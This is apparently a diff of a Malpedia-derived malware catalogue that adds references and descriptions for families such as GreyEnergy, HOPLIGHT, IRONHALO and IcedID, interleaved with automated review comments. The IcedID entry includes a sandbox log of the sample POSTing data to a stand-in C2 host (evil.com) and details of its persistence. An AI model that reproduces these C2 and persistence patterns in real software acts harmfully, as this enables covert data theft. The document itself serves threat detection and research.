@@ -7672,7 +9032,7 @@ "value": "Graftor" }, { - "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", + "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card\u2019s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system\u2019s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. 
Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", @@ -7716,6 +9076,19 @@ "uuid": "1de27925-f94c-462d-acb6-f75822e05ec4", "value": "Gravity RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grease", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4ed079e6-69bd-481b-b873-86ced9ded750", + "value": "GREASE" + }, { "description": "", "meta": { @@ -7731,6 +9104,23 @@ "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17", "value": "GreenShaitan" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy", + "https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/", + "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", + "https://www.eset.com/int/greyenergy-exposed/", + "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", + "https://github.com/NozomiNetworks/greyenergy-unpacker" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5a683d4f-31a1-423e-a136-d348910ca967", + "value": "GreyEnergy" + }, { "description": "", "meta": { 
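Review bot: GreyEnergy is added with `"description": ""` although five references are attached, including the ESET paper and the Nozomi unpacker repository, so analysts have to open the sources to learn what the family is. A one-sentence summary drawn from the ESET paper (what the family is and who it is attributed to, only as far as that paper states it) would make the entry usable on its own; the same applies to the GREASE entry above it, which has two refs and no description. The `github.com/NozomiNetworks/greyenergy-unpacker` link is a tool rather than a write-up and could be labelled as such in the description.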
@@ -7822,6 +9212,8 @@ "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html", + "https://www.uperesia.com/hancitor-packer-demystified", + "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/", "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak", "https://boozallenmts.com/resources/news/closer-look-hancitor", "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/" @@ -7880,6 +9272,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger", + "https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html", "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/", "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", @@ -7888,6 +9281,7 @@ "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/" ], "synonyms": [ + "HawkEye Reborn", "Predator Pain" ], "type": [] 
@@ -7914,6 +9308,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth", "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" ], @@ -7955,7 +9350,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor", - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", + "https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html" ], "synonyms": [], "type": [] @@ -7982,6 +9378,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom", + "https://blog.dcso.de/enterprise-malware-as-a-service/", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" ], "synonyms": [], @@ -8096,7 +9493,7 @@ "value": "HLUX" }, { - "description": "", + "description": " a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry", 
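Review bot: The new homefry description starts with a stray space and a lowercase article (`" a 64-bit Windows password dumper/cracker ...`), which reads like a paste of the FireEye sentence with its leading `HOMEFRY:` label cut off; every other description in this file opens with the family name. Suggest `"description": "HOMEFRY is a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. ..."`. `XOR x56` presumably means a single-byte key of 0x56 and is clearer written as `0x56`.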
@@ -8108,6 +9505,20 @@ "uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d", "value": "homefry" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight", + "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A", + "https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3e489132-8687-46b3-b9a7-74ba8fafaddf", + "value": "HOPLIGHT" + }, { "description": "", "meta": { @@ -8198,7 +9609,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hworm", - "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412" + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412", + "http://blogs.360.cn/post/analysis-of-apt-c-37.html" ], "synonyms": [ "houdini" 
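Review bot: The Palo Alto reference in the hworm hunk still carries its social-tracking query string (`?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412`), which identifies a tweet campaign rather than the article and gets replicated into every MISP instance that syncs this galaxy; the commit touches this line only to append a comma. Suggest the canonical URL `"https://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/"` (https if it resolves). The HOPLIGHT entry above it has `"description": ""` despite citing US-CERT AR19-100A, which would support at least a one-line summary.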
@@ -8222,19 +9634,23 @@ "value": "HyperBro" }, { - "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 
44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", + "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within 
%LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If \u201c/i\u201d is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If \u201c/I\u201d is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: 
hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html", "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", "https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid", + "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/", "https://www.youtube.com/watch?v=wObF9n2UIAM", "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", 
"https://www.youtube.com/watch?v=7Dk7NkIbVqY", + "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/", "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", - "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" + "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", + "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" ], "synonyms": [ "BokBot" @@ -8330,6 +9746,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat", + "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/" ], "synonyms": [], 
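Review bot: The scheduled-task path in the IcedID description is escaped inconsistently: the JSON text `%LocalAppData%\\$Example\\\\waroupada.exe` decodes to one backslash before `$Example` and two before the file name, so the indicator as rendered is not a valid path; `%LocalAppData%\\$Example\\waroupada.exe` is presumably intended. The same description says the argument is `/i` in one bullet and `/I` in the next — if the sample's check is case-sensitive only one is right, so confirm against the analysis. The remainder is a raw INetSim log with sandbox-local paths and a fake `evil.com` host; the only reusable indicator in it is the POST URI pattern `/forum/posting.php?a=...&b=...`, and the log could be reduced to that. This commit only re-escapes the curly quotes, so these points are pre-existing but now sit on the new side.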
@@ -8383,24 +9800,49 @@ "uuid": "22755fda-497e-4ef0-823e-5cb6d8701420", "value": "InvisiMole" }, + { + "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user\u2019s Startup folder.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo", + "https://www.symantec.com/security-center/writeup/2015-122210-5128-99", + "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", + "https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "44599616-3849-4960-9379-05307287ff80", + "value": "IRONHALO" + }, { "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. 
The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb", - "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", - "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/", - "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", - "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html", + "https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware", "https://lokalhost.pl/gozi_tree.txt", - "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245", - "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html", "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", - "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", + 
"https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html", + "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", + "https://www.youtube.com/watch?v=KvOpNznu_3w", "https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based", - "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html" + "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", + "http://benkow.cc/DreambotSAS19.pdf", + "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", + "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/", + "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", + "https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/", + "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", + "https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/", + "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/", + "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", + "https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/", + "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features" ], "synonyms": [ "Gozi ISFB", @@ -8417,7 +9859,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent", - "http://www.clearskysec.com/ismagent/" + "http://www.clearskysec.com/ismagent/", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" ], "synonyms": [], "type": [] 
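Review bot: The IRONHALO description begins with a stray leading space and has another one after the `\r\n` before `The encoded payload`, which suggests a paste from the FireEye post with its `IRONHALO:` label removed; trim both (`"description": "IRONHALO is a downloader that uses the HTTP protocol ..."`). The `igfxHK[%rand%].dat` / `.exe` naming and the Startup-folder persistence are the detection-relevant details and should stay verbatim. In the ISFB refs the hunk removes and re-adds several URLs in a different order (vkremez, arielkoren, github, fireeye, youtube, malwarebytes, cecyf, cylance); if this is generator ordering it is harmless, but it hides the genuinely new references in the diff.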
@@ -8452,6 +9895,19 @@ "uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070", "value": "iSpy Keylogger" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.israbye", + "https://twitter.com/malwrhunterteam/status/1085162243795369984" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c5cec575-325c-44b8-af24-4feb330eec8a", + "value": "IsraBye" + }, { "description": "ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public", "meta": { @@ -8524,9 +9980,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku", "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf", + "https://securelist.com/whos-really-spreading-through-the-bright-star/68978/", "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146" ], "synonyms": [ + "C3PRO-RACOON", + "KCNA Infostealer", "Reconcyc" ], "type": [] @@ -8547,6 +10006,20 @@ "uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea", "value": "Jasus" }, + { + "description": "Ransomware written in Go.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jcry", + "https://twitter.com/IdoNaor1/status/1101936940297924608", + "https://twitter.com/0xffff0800/status/1102078898320302080" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fea703ec-9b24-4119-96b3-7ae6bec3b203", + "value": "JCry" + }, { "description": "", "meta": { 
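Review bot: The JCry entry's only sources besides Malpedia are two tweets (`twitter.com/IdoNaor1/...`, `twitter.com/0xffff0800/...`), and the IsraBye entry in the same line has the same pattern with a single MalwareHunterTeam tweet; tweets get deleted and accounts renamed, so these references will go dead silently. Suggest adding an archived copy or a durable write-up alongside them. `"Ransomware written in Go."` could also carry whatever the tweets actually establish (extension, ransom note, targeting) — but only what is verifiable there.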
@@ -8693,6 +10166,19 @@
 "uuid": "8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf",
 "value": "Karius"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karkoff",
+ "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a45c16d9-6945-428c-af46-0436903f9329",
+ "value": "Karkoff"
+ },
 {
 "description": "",
 "meta": {
@@ -8748,6 +10234,41 @@ "uuid": "7d69892e-d582-4545-8798-4a9a84a821ea", "value": "Kelihos" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown", + "https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/", + "https://blog.cystack.net/word-based-malware-attack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bd9e21d1-7da3-4699-816f-0e368a63bc18", + "value": "KerrDown" + }, + { + "description": "KeyBase is a .NET credential stealer and keylogger that first emerged in February 2015. It often incorporates Nirsoft tools such as MailPassView and WebBrowserPassView for additional credential grabbing.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.keybase", + "https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/", + "https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html", + "https://unit42.paloaltonetworks.com/keybase-threat-grows-despite-public-takedown-a-picture-is-worth-a-thousand-words/", + "https://community.rsa.com/community/products/netwitness/blog/2018/02/15/malspam-delivers-keybase-keylogger-2-11-2017", + "https://voidsec.com/keybase-en/", + "https://www.virusbulletin.com/virusbulletin/2016/07/new-keylogger-block/", + "https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/" + ], + "synonyms": [ + "Kibex" + ], + "type": [] + }, + "uuid": "8a7bb20e-7e90-4330-8f53-744bd5519f6f", + "value": "KeyBase" + }, { "description": "", "meta": { @@ -8786,7 +10307,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble", - "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A" + "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A", + "https://research.checkpoint.com/north-korea-turns-against-russian-targets/" ], "synonyms": [], "type": [] 
@@ -8794,19 +10316,6 @@
 "uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5",
 "value": "KEYMARBLE"
 },
- {
- "description": "",
- "meta": {
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.keypass",
- "https://securelist.com/keypass-ransomware/87412/"
- ],
- "synonyms": [],
- "type": []
- },
- "uuid": "447e5d7d-dd23-43b3-8cbc-b835498a49dd",
- "value": "KeyPass"
- },
 {
 "description": "",
 "meta": {
@@ -8872,6 +10381,7 @@
 "description": "KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.\r\n\r\nPDB-strings suggest a relationship to JogLog v6 and v7.",
 "meta": {
 "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer",
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer"
 ],
 "synonyms": [
@@ -8888,7 +10398,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd",
 "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://www.morphick.com/resources/news/klrd-keylogger"
+ "https://securitykitten.github.io/2016/11/28/the-klrd-keylogger.html"
 ],
 "synonyms": [],
 "type": []
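Review bot: The KleptoParasite hunk adds `"https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer",` directly above an identical existing line, so the refs array now holds the same URL twice; this looks like the generator merging a Malpedia-derived reference with the hand-maintained one. Drop the added line (or deduplicate refs in the generator) so consumers do not render duplicate references and so the diff reflects a real change. The KLRD change replacing the dead morphick.com link with the securitykitten mirror is fine.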
